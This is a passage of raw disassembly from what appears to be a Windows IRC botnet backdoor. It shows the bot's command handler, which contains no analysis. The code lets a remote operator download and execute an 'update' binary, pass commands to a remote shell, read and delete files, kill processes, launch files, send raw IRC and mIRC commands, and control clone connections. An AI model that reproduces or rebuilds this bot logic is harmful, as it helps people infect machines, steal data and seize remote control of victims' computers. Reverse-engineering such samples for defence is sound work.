loc_40A4F8: ; CODE XREF: sub_4078FA+2BE2�j
; sub_4078FA+2BF0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40A4FD: ; CODE XREF: sub_4078FA+2BFC�j
test eax, eax
mov edi, [ebp+arg_4]
jz loc_40A670
lea eax, [ebp+var_B74]
push eax
push 104h
call ds:dword_41F0A4 ; GetTempPathA
push 0FFh
push [ebp+var_8]
lea eax, [ebp+var_F28]
push eax
call sub_412C40
lea eax, [ebp+var_A70]
push eax
call sub_40E4F3
push eax
lea eax, [ebp+var_B74]
push eax
lea eax, [ebp+var_E28]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_412BB5
mov eax, [ebp+ebx+var_98]
xor esi, esi
add esp, 20h
cmp eax, esi
mov [ebp+var_C24], 1
mov [ebp+var_C20], esi
jz short loc_40A587
push 10h
push esi
push eax
call sub_413809
add esp, 0Ch
mov [ebp+var_C18], eax
jmp short loc_40A58D
; ---------------------------------------------------------------------------
loc_40A587: ; CODE XREF: sub_4078FA+2C77�j
mov [ebp+var_C18], esi
loc_40A58D: ; CODE XREF: sub_4078FA+2C8B�j
mov ebx, [ebp+ebx+var_94]
cmp ebx, esi
jz short loc_40A5A7
push ebx
call sub_412F42
pop ecx
mov [ebp+var_C1C], eax
jmp short loc_40A5AD
; ---------------------------------------------------------------------------
loc_40A5A7: ; CODE XREF: sub_4078FA+2C9C�j
mov [ebp+var_C1C], esi
loc_40A5AD: ; CODE XREF: sub_4078FA+2CAB�j
movzx eax, [ebp+var_447]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_C14], eax
lea eax, [ebp+var_FA8]
push eax
mov [ebp+var_FAC], edi
call sub_412C40
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_C0C], eax
mov eax, [ebp+var_C]
mov [ebp+var_C10], eax
lea eax, [ebp+var_2E0]
push offset aUpdateDownload ; "[UPDATE]: Downloading update from: %s."
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 17h
push eax
call sub_410EEA
add esp, 24h
mov [ebp+var_C28], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_FAC]
push eax
push offset sub_401F06
push esi
push esi
call ds:dword_41F00C ; CreateThread
mov ecx, [ebp+var_C28]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40A666
call ds:dword_41F008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2E0]
push offset aUpdateFailedTo ; "[UPDATE]: Failed to start download thre"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_40A685
; ---------------------------------------------------------------------------
loc_40A65E: ; CODE XREF: sub_4078FA+2D72�j
push 32h
call ds:dword_41F000 ; Sleep
loc_40A666: ; CODE XREF: sub_4078FA+2D45�j
cmp [ebp+var_C08], esi
jz short loc_40A65E
jmp short loc_40A685
; ---------------------------------------------------------------------------
loc_40A670: ; CODE XREF: sub_4078FA+2C08�j
lea eax, [ebp+var_2E0]
push offset aUpdateUpToDate ; "[UPDATE]: Up to Date"
push eax
call sub_412BB5
pop ecx
pop ecx
xor esi, esi
loc_40A685: ; CODE XREF: sub_4078FA+2D62�j
; sub_4078FA+2D74�j
cmp [ebp+var_C], esi
jnz loc_409015
push esi
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push edi
jmp loc_40900D
; ---------------------------------------------------------------------------
loc_40A6A5: ; CODE XREF: sub_4078FA+212B�j
; sub_4078FA+213F�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jz loc_407B7B
cmp [ebp+var_14], eax
jz loc_407B7B
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
push eax
push [ebp+var_9C]
lea eax, [ebp+var_2E0]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+var_2E0]
push eax
push [ebp+arg_0]
call sub_412C40
push [ebp+var_8]
call sub_412F42
add esp, 30h
test eax, eax
jle short loc_40A72E
push [ebp+var_8]
call sub_412F42
imul eax, 3E8h
pop ecx
push eax
call ds:dword_41F000 ; Sleep
loc_40A72E: ; CODE XREF: sub_4078FA+2E1C�j
push offset aMainDelay_ ; "[MAIN]: Delay."
call sub_401C33
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40A742: ; CODE XREF: sub_4078FA+2103�j
; sub_4078FA+2117�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jz loc_407B7B
cmp [ebp+var_14], eax
jz loc_40CFE2
mov esi, [ebp+var_10]
push esi
push [ebp+var_14]
call sub_413920
pop ecx
pop ecx
mov ebx, eax
push 7
inc esi
pop ecx
xor eax, eax
mov edi, offset aRepeat ; "repeat"
repe cmpsb
lea eax, [ebp+var_2E0]
push ebx
jz short loc_40A7FC
push [ebp+var_9C]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+var_2E0]
push eax
push [ebp+arg_0]
call sub_412C40
push ebx
lea eax, [ebp+var_2E0]
push offset aMainRepeatS ; "[MAIN]: Repeat: %s"
push eax
call sub_412BB5
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
push [ebp+var_8]
call sub_412F42
add esp, 38h
test eax, eax
jle loc_40CFE2
push [ebp+var_8]
call sub_412F42
add eax, [ebp+arg_24]
pop ecx
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40A7FC: ; CODE XREF: sub_4078FA+2E8D�j
push offset aMainRepeatNotA ; "[MAIN]: Repeat not allowed in command l"...
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40A806: ; CODE XREF: sub_4078FA+20DB�j
; sub_4078FA+20EF�j
push [ebp+var_10]
lea eax, [ebp+var_2E0]
push offset aPartS_0 ; "PART %s"
push eax
call sub_412BB5
push [ebp+var_8]
call sub_412F42
add esp, 10h
loc_40A825: ; CODE XREF: sub_4078FA+2F98�j
test eax, eax
jle loc_40CFE2
push [ebp+var_8]
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
loc_40A841: ; CODE XREF: sub_4078FA+37D1�j
lea eax, [ebp+var_2E0]
push eax
push offset aS_4 ; "%s\r\n"
push [ebp+var_8]
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
jmp loc_40C133
; ---------------------------------------------------------------------------
loc_40A86C: ; CODE XREF: sub_4078FA+20B3�j
; sub_4078FA+20C7�j
push [ebp+ebx+var_98]
lea eax, [ebp+var_2E0]
push [ebp+var_10]
push offset aJoinSS ; "JOIN %s %s"
push eax
call sub_412BB5
push [ebp+var_8]
call sub_412F42
add esp, 14h
jmp short loc_40A825
; ---------------------------------------------------------------------------
loc_40A894: ; CODE XREF: sub_4078FA+208B�j
; sub_4078FA+209F�j
push [ebp+var_10]
loc_40A897: ; DATA XREF: .data:0042BD1C�o
; .data:0042BD60�o ...
lea eax, [ebp+var_2E0]
push offset aNickS ; "NICK %s"
push eax
call sub_412BB5
mov esi, [ebp+var_8]
push esi
call sub_412F42
add esp, 10h
test eax, eax
jle loc_40CFE2
push esi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
lea eax, [ebp+var_2E0]
push eax
push offset aS_4 ; "%s\r\n"
push esi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
push [ebp+var_10]
push esi
push offset aCloneNickSS ; "[CLONE]: Nick (%s): %s"
loc_40A8FB: ; CODE XREF: sub_4078FA+308C�j
; sub_4078FA+30FB�j ...
call sub_401CA7
jmp loc_40BDF5
; ---------------------------------------------------------------------------
loc_40A905: ; CODE XREF: sub_4078FA+2063�j
; sub_4078FA+2077�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40A937
push esi
lea eax, [ebp+var_2E0]
push offset aModeS ; "MODE %s"
push eax
call sub_412BB5
add esp, 0Ch
loc_40A937: ; CODE XREF: sub_4078FA+3026�j
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
lea eax, [ebp+var_2E0]
push eax
push offset aS_4 ; "%s\r\n"
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
push esi
push edi
push offset aCloneModeSS ; "[CLONE]: Mode (%s): %s"
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40A98B: ; CODE XREF: sub_4078FA+203B�j
; sub_4078FA+204F�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
push esi
push offset aS_4 ; "%s\r\n"
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
push esi
push edi
push offset aCloneRawSS ; "[CLONE]: Raw (%s): %s"
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40A9FA: ; CODE XREF: sub_4078FA+2013�j
; sub_4078FA+2027�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_404592
push esi
push offset aMainModeChange ; "[MAIN]: Mode change: %s"
jmp loc_40B2C5
; ---------------------------------------------------------------------------
loc_40AA34: ; CODE XREF: sub_4078FA+1FEB�j
; sub_4078FA+1FFF�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jz loc_407B7B
push [ebp+var_10]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
call sub_412F42
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_41F000 ; Sleep
push [ebp+ebx+var_98]
push [ebp+var_10]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_404592
push offset aMainCycle_ ; "[MAIN]: Cycle."
call sub_401C33
jmp loc_40B2CA
; ---------------------------------------------------------------------------
loc_40AA9A: ; CODE XREF: sub_4078FA+1FC3�j
; sub_4078FA+1FD7�j
cmp [ebp+var_14], 0
jz loc_40CFE2
lea edx, [eax+1]
loc_40AAA7: ; CODE XREF: sub_4078FA+31B2�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AAA7
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40AAB8: ; CODE XREF: sub_4078FA+31C3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AAB8
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push esi
lea eax, [ebp+var_2E0]
push offset dword_425A58
push eax
call sub_412BB5
push 0
push 0
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_8]
push [ebp+arg_4]
call sub_4045DD
push esi
push [ebp+var_8]
push offset aMainActionSS_ ; "[MAIN]: Action: %s: %s."
call sub_401CA7
add esp, 2Ch
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40AB1D: ; CODE XREF: sub_4078FA+1F9B�j
; sub_4078FA+1FAF�j
cmp [ebp+var_14], 0
jz loc_40CFE2
lea edx, [eax+1]
loc_40AB2A: ; CODE XREF: sub_4078FA+3235�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40AB2A
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40AB3B: ; CODE XREF: sub_4078FA+3246�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40AB3B
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push 0
push 0
push esi
push [ebp+var_8]
push [ebp+arg_4]
call sub_4045DD
push esi
push [ebp+var_8]
push offset aMainPrivmsgSS_ ; "[MAIN]: Privmsg: %s: %s."
call sub_401CA7
loc_40AB80: ; CODE XREF: sub_4078FA+52BC�j
add esp, 20h
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40AB88: ; CODE XREF: sub_4078FA+1F73�j
; sub_4078FA+1F87�j
cmp [ebp+var_14], 0
jz loc_407B7B
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_407B7B
push eax
push [ebp+var_8]
call sub_401B23
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainAliasAdded ; "[MAIN]: Alias added: %s."
push eax
call sub_412BB5
add esp, 14h
loc_40ABC7: ; CODE XREF: sub_4078FA+38BC�j
; sub_4078FA+4C47�j
cmp [ebp+var_C], 0
jnz short loc_40ABEA
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40ABEA: ; CODE XREF: sub_4078FA+32D1�j
; sub_4078FA+4405�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
jmp loc_40D1A1
; ---------------------------------------------------------------------------
loc_40ABFB: ; CODE XREF: sub_4078FA+1E33�j
; sub_4078FA+1E47�j
push [ebp+var_8]
push [ebp+arg_1C]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_40CFE2
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
jz short loc_40AC96
push ebx
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
lea eax, [ebp+var_2E0]
jz short loc_40AC84
push esi
push [ebp+var_9C]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+var_2E0]
push eax
push [ebp+arg_0]
call sub_412C40
push esi
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainGethostSCo ; "[MAIN]: Gethost: %s, Command: %s"
push eax
call sub_412BB5
add esp, 34h
inc [ebp+arg_24]
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40AC84: ; CODE XREF: sub_4078FA+3336�j
push offset aMainUnableToEx ; "[MAIN]: Unable to extract Gethost comma"...
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40AC96: ; CODE XREF: sub_4078FA+331F�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_410086
add esp, 0Ch
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainGethostS_ ; "[MAIN]: Gethost: %s."
push 200h
push eax
call sub_412E0D
add esp, 24h
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40ACE0: ; CODE XREF: sub_4078FA+1B62�j
; sub_4078FA+1B76�j
push offset aR ; "r"
push [ebp+var_8]
call sub_413393
mov edi, eax
test edi, edi
pop ecx
pop ecx
lea eax, [ebp+var_2E0]
jz short loc_40AD5E
push edi
mov esi, 200h
push esi
push eax
call sub_4142F5
add esp, 0Ch
jmp short loc_40AD38
; ---------------------------------------------------------------------------
loc_40AD0D: ; CODE XREF: sub_4078FA+3440�j
push 1
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
push edi
lea eax, [ebp+var_2E0]
push esi
push eax
call sub_4142F5
add esp, 20h
loc_40AD38: ; CODE XREF: sub_4078FA+3411�j
test eax, eax
jnz short loc_40AD0D
push edi
call sub_412F93
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainReadFileCo ; "[MAIN]: Read file complete: %s"
push eax
call sub_412BB5
add esp, 10h
jmp loc_40AE37
; ---------------------------------------------------------------------------
loc_40AD5E: ; CODE XREF: sub_4078FA+33FF�j
push [ebp+var_8]
push offset aMainReadFileFa ; "[MAIN]: Read file failed: %s"
loc_40AD66: ; CODE XREF: sub_4078FA+2F07�j
push eax
call sub_412BB5
add esp, 0Ch
jmp loc_40AE14
; ---------------------------------------------------------------------------
loc_40AD74: ; CODE XREF: sub_4078FA+1B3A�j
; sub_4078FA+1B4E�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_40CFE2
mov edi, ebx
dec edi
loc_40AD98: ; CODE XREF: sub_4078FA+34A4�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40AD98
mov esi, offset asc_420328 ; "\n"
push ebx
movsw
call sub_40DB6D
test eax, eax
pop ecx
lea eax, [ebp+var_2E0]
jnz short loc_40ADBF
push offset aCmdErrorSendin ; "[CMD]: Error sending to remote shell."
jmp short loc_40AE0C
; ---------------------------------------------------------------------------
loc_40ADBF: ; CODE XREF: sub_4078FA+34BC�j
push ebx
push offset aCmdCommandsS ; "[CMD]: Commands: %s"
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_40AE37
; ---------------------------------------------------------------------------
loc_40ADD0: ; CODE XREF: sub_4078FA+1B12�j
; sub_4078FA+1B26�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
test eax, eax
pop ecx
pop ecx
jz loc_40CFE2
push eax
call sub_4057CD
test eax, eax
pop ecx
lea eax, [ebp+var_2E0]
jnz short loc_40AE07
push offset aMircClientNotO ; "[mIRC]: Client not open."
jmp short loc_40AE0C
; ---------------------------------------------------------------------------
loc_40AE07: ; CODE XREF: sub_4078FA+3504�j
push offset aMircCommandSen ; "[mIRC]: Command sent."
loc_40AE0C: ; CODE XREF: sub_4078FA+1C34�j
; sub_4078FA+1C3E�j ...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40AE14: ; CODE XREF: sub_4078FA+1BAF�j
; sub_4078FA+1C0C�j ...
cmp [ebp+var_C], 0
jnz short loc_40AE37
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40AE37: ; CODE XREF: sub_4078FA+3385�j
; sub_4078FA+3397�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
jmp loc_40CFE2
; ---------------------------------------------------------------------------
loc_40AE49: ; CODE XREF: sub_4078FA+1AEA�j
; sub_4078FA+1AFE�j
push 0
push [ebp+var_9C]
push [ebp+arg_4]
push [ebp+var_8]
call sub_4030C4
push [ebp+var_8]
push offset aFileListS ; "[FILE]: List: %s"
jmp loc_40A8FB
; ---------------------------------------------------------------------------
loc_40AE69: ; CODE XREF: sub_4078FA+1AC2�j
; sub_4078FA+1AD6�j
push 20h
push [ebp+var_8]
call ds:dword_41F0A0 ; SetFileAttributesA
push [ebp+var_8]
call ds:dword_41F0B8 ; DeleteFileA
test eax, eax
jz short loc_40AE8B
push [ebp+var_8]
push offset aFileDeletedS_0 ; "[FILE]: Deleted '%s'."
jmp short loc_40AE96
; ---------------------------------------------------------------------------
loc_40AE8B: ; CODE XREF: sub_4078FA+3585�j
push offset aFile ; "[FILE]:"
call sub_405708
push eax
loc_40AE96: ; CODE XREF: sub_4078FA+358F�j
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
loc_40AEA7: ; CODE XREF: sub_4078FA+36F0�j
add esp, 10h
loc_40AEAA: ; CODE XREF: sub_4078FA+3708�j
; sub_4078FA+4ABC�j
cmp [ebp+var_C], 0
jnz loc_409015
push 0
jmp loc_408FFA
; ---------------------------------------------------------------------------
loc_40AEBB: ; CODE XREF: sub_4078FA+1A9A�j
; sub_4078FA+1AAE�j
push [ebp+var_8]
call sub_412F42
push eax
call sub_4074C6
xor esi, esi
pop ecx
inc esi
pop ecx
push [ebp+var_8]
cmp eax, esi
lea eax, [ebp+var_2E0]
jnz short loc_40AEE2
push offset aProcProcessKil ; "[PROC]: Process killed ID: %s"
jmp short loc_40AEE7
; ---------------------------------------------------------------------------
loc_40AEE2: ; CODE XREF: sub_4078FA+35DF�j
push offset aProcFailedToTe ; "[PROC]: Failed to terminate process ID:"...
loc_40AEE7: ; CODE XREF: sub_4078FA+35E6�j
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], 0
jnz loc_409018
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
jmp loc_409018
; ---------------------------------------------------------------------------
loc_40AF1C: ; CODE XREF: sub_4078FA+1A72�j
; sub_4078FA+1A86�j
push 1
xor esi, esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4070E8
add esp, 1Ch
cmp eax, 1
jnz short loc_40AF55
push [ebp+var_8]
push offset aProcProcessK_0 ; "[PROC]: Process killed & deleted: %s"
loc_40AF46: ; CODE XREF: sub_4078FA+299B�j
lea eax, [ebp+var_2E0]
loc_40AF4C: ; CODE XREF: sub_4078FA+2BCF�j
; sub_4078FA+3694�j ...
push eax
call sub_412BB5
add esp, 0Ch
loc_40AF55: ; CODE XREF: sub_4078FA+29B0�j
; sub_4078FA+2B73�j ...
cmp [ebp+var_C], esi
jnz loc_409015
push esi
jmp loc_408FFA
; ---------------------------------------------------------------------------
loc_40AF64: ; CODE XREF: sub_4078FA+1A4A�j
; sub_4078FA+1A5E�j
xor esi, esi
push esi
push esi
push esi
push [ebp+var_8]
push [ebp+var_4]
push esi
push [ebp+arg_4]
call sub_4070E8
add esp, 1Ch
push [ebp+var_8]
cmp eax, 1
lea eax, [ebp+var_2E0]
jnz short loc_40AF90
push offset aProcProcessK_1 ; "[PROC]: Process killed: %s"
jmp short loc_40AF4C
; ---------------------------------------------------------------------------
loc_40AF90: ; CODE XREF: sub_4078FA+368D�j
push offset aProcFailedTo_0 ; "[PROC]: Failed to terminate process: %s"...
jmp short loc_40AF4C
; ---------------------------------------------------------------------------
loc_40AF97: ; CODE XREF: sub_4078FA+1A22�j
; sub_4078FA+1A36�j
mov esi, [ebp+var_8]
push esi
call dword_433514 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40AFBF
push 2
push 4
lea eax, [ebp+arg_0]
push eax
call dword_433590 ; gethostbyaddr
test eax, eax
jz short loc_40AFEF
push dword ptr [eax]
jmp short loc_40AFD8
; ---------------------------------------------------------------------------
loc_40AFBF: ; CODE XREF: sub_4078FA+36AD�j
push esi
call dword_433500 ; gethostbyname
test eax, eax
jz short loc_40AFEF
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_433520 ; inet_ntoa
push eax
loc_40AFD8: ; CODE XREF: sub_4078FA+36C3�j
push esi
lea eax, [ebp+var_2E0]
push offset aDnsLookupSS_ ; "[DNS]: Lookup: %s -> %s."
push eax
call sub_412BB5
jmp loc_40AEA7
; ---------------------------------------------------------------------------
loc_40AFEF: ; CODE XREF: sub_4078FA+36BF�j
; sub_4078FA+36CE�j
lea eax, [ebp+var_2E0]
push offset aDnsCouldnTReso ; "[DNS]: Couldn't resolve hostname."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40AEAA
; ---------------------------------------------------------------------------
loc_40B007: ; CODE XREF: sub_4078FA+19FA�j
; sub_4078FA+1A0E�j
push 7Fh
push [ebp+var_8]
push [ebp+arg_14]
call sub_412C40
push [ebp+var_8]
lea eax, [ebp+var_2E0]
push offset aMainServerChan ; "[MAIN]: Server changed to: '%s'."
push eax
call sub_412BB5
add esp, 18h
jmp loc_40C47E
; ---------------------------------------------------------------------------
loc_40B030: ; CODE XREF: sub_4078FA+19D2�j
; sub_4078FA+19E6�j
push 5
xor esi, esi
push esi
push esi
push [ebp+var_8]
push offset aOpen ; "open"
push esi
call dword_4335A8 ; ShellExecuteA
push [ebp+var_8]
test eax, eax
lea eax, [ebp+var_2E0]
jz short loc_40B05C
push offset aShellFileOpene ; "[SHELL]: File opened: %s"
jmp loc_40AF4C
; ---------------------------------------------------------------------------
loc_40B05C: ; CODE XREF: sub_4078FA+3756�j
push offset aShellCouldnTOp ; "[SHELL]: Couldn't open file: %s"
jmp loc_40AF4C
; ---------------------------------------------------------------------------
loc_40B066: ; CODE XREF: sub_4078FA+19AA�j
; sub_4078FA+19BE�j
mov eax, [ebp+var_8]
mov cl, [eax]
mov byte_42AE5C, cl
movsx eax, byte ptr [eax]
push eax
push offset aMainPrefixChan ; "[MAIN]: Prefix changed to: '%c'."
jmp loc_40C46F
; ---------------------------------------------------------------------------
loc_40B07F: ; CODE XREF: sub_4078FA+1982�j
; sub_4078FA+1996�j
push [ebp+var_8]
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push [ebp+var_8]
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
push 0
push 0
lea eax, [ebp+var_B8]
push 2
push eax
call sub_40E7B0
push eax
lea eax, [ebp+var_2E0]
push offset aNickS ; "NICK %s"
push eax
call sub_412BB5
add esp, 1Ch
jmp loc_40A841
; ---------------------------------------------------------------------------
loc_40B0D0: ; CODE XREF: sub_4078FA+195A�j
; sub_4078FA+196E�j
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_407B7B
push edi
call sub_412F42
mov esi, 1F4h
cmp eax, esi
pop ecx
jge loc_407B7B
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
pop ecx
pop ecx
push esi
call ds:dword_41F000 ; Sleep
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call dword_4335AC ; closesocket
push [ebp+var_18]
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_43434C[eax]
call ds:dword_41F0C8 ; TerminateThread
push edi
call sub_412F42
imul eax, 234h
and dword_43434C[eax], 0
push edi
call sub_412F42
imul eax, 234h
and byte ptr dword_434138[eax], 0
pop ecx
pop ecx
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40B17E: ; CODE XREF: sub_4078FA+1932�j
; sub_4078FA+1946�j
mov edi, [ebp+var_8]
push 4
mov esi, offset aAll ; "all"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40B1BB
call sub_41105B
test eax, eax
jle short loc_40B1A3
push eax
push offset aThreadsStopped ; "[THREADS]: Stopped: %d thread(s)."
jmp loc_40C532
; ---------------------------------------------------------------------------
loc_40B1A3: ; CODE XREF: sub_4078FA+389C�j
push offset aThreadsNoActiv ; "[THREADS]: No active threads found."
loc_40B1A8: ; CODE XREF: sub_4078FA+420E�j
; sub_4078FA+422D�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40ABC7
; ---------------------------------------------------------------------------
loc_40B1BB: ; CODE XREF: sub_4078FA+3893�j
mov edi, [ebp+var_1C]
jmp short loc_40B22D
; ---------------------------------------------------------------------------
loc_40B1C0: ; CODE XREF: sub_4078FA+3937�j
mov esi, [ebp+edi*4+var_A4]
test esi, esi
jz loc_407B7B
push esi
call sub_412F42
push eax
call sub_410FD3
pop ecx
pop ecx
test eax, eax
push esi
lea eax, [ebp+var_2E0]
jz short loc_40B1EF
push offset aThreadsKilledT ; "[THREADS]: Killed thread: %s."
jmp short loc_40B1F4
; ---------------------------------------------------------------------------
loc_40B1EF: ; CODE XREF: sub_4078FA+38EC�j
push offset aThreadsFailedT ; "[THREADS]: Failed to kill thread: %s."
loc_40B1F4: ; CODE XREF: sub_4078FA+38F3�j
push eax
call sub_412BB5
add esp, 0Ch
cmp [ebp+var_C], 0
jnz short loc_40B220
push 0
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
add esp, 14h
loc_40B220: ; CODE XREF: sub_4078FA+3907�j
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
pop ecx
loc_40B22D: ; CODE XREF: sub_4078FA+38C4�j
inc edi
cmp edi, 20h
jb short loc_40B1C0
jmp loc_407B7B
; ---------------------------------------------------------------------------
loc_40B238: ; CODE XREF: sub_4078FA+190A�j
; sub_4078FA+191E�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_8]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
push esi
push offset aS_4 ; "%s\r\n"
push [ebp+arg_4]
call sub_404592
push esi
push offset aMainIrcRawS_ ; "[MAIN]: IRC Raw: %s."
jmp short loc_40B2C5
; ---------------------------------------------------------------------------
loc_40B26F: ; CODE XREF: sub_4078FA+18E2�j
; sub_4078FA+18F6�j
push [ebp+var_8]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_404592
push [ebp+var_8]
push offset aMainPartedChan ; "[MAIN]: Parted channel: '%s'."
